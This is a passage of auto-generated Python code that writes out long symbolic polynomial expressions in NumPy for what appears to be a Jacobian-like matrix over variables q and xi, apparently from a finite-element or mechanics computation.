- 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*xi**10*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - 
q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] + 8*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - 
q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] + 6*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] + 4*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] + 2*q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)), 
(-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[1, 0] - q[2, 0]))*(60131984.3684659*xi**9*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + 
q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*xi**10*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 
0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-38484469995.8182*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 252839.506172839*(q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1066.66666666667*(q[1, 0] - q[2, 0])**2 + 1)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 160351958.315909*numpy.sqrt(3)*xi**10*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 
5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 5073636.18108931*numpy.sqrt(3)*xi**8*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 99887.2123151958*numpy.sqrt(3)*xi**6*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(-q[3, 0] - q[4, 0] + 2*q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0]) + 4.44444444444444*numpy.sqrt(3)*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)), 0, 0, 0, 0, 0, 0, 0, 0, 0], [(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(-79.0123456790123*q[0, 0] - 79.0123456790123*q[1, 0] - 79.0123456790123*q[2, 0] - 35.5555555555555) + 22474.6227709191*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 
0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 1522090.85432679*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 60131984.3684659*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) + 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (60131984.3684659*xi**9*(q[3, 0] 
+ q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(337119.341563786*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 31963907.9408627*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 1623563577.94858*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 51312626661.0909*(10*q[0, 0] - 5*q[1, 0] - 5*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 2844.44444444444*q[0, 0] + 1422.22222222222*q[1, 0] + 1422.22222222222*q[2, 0]) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 
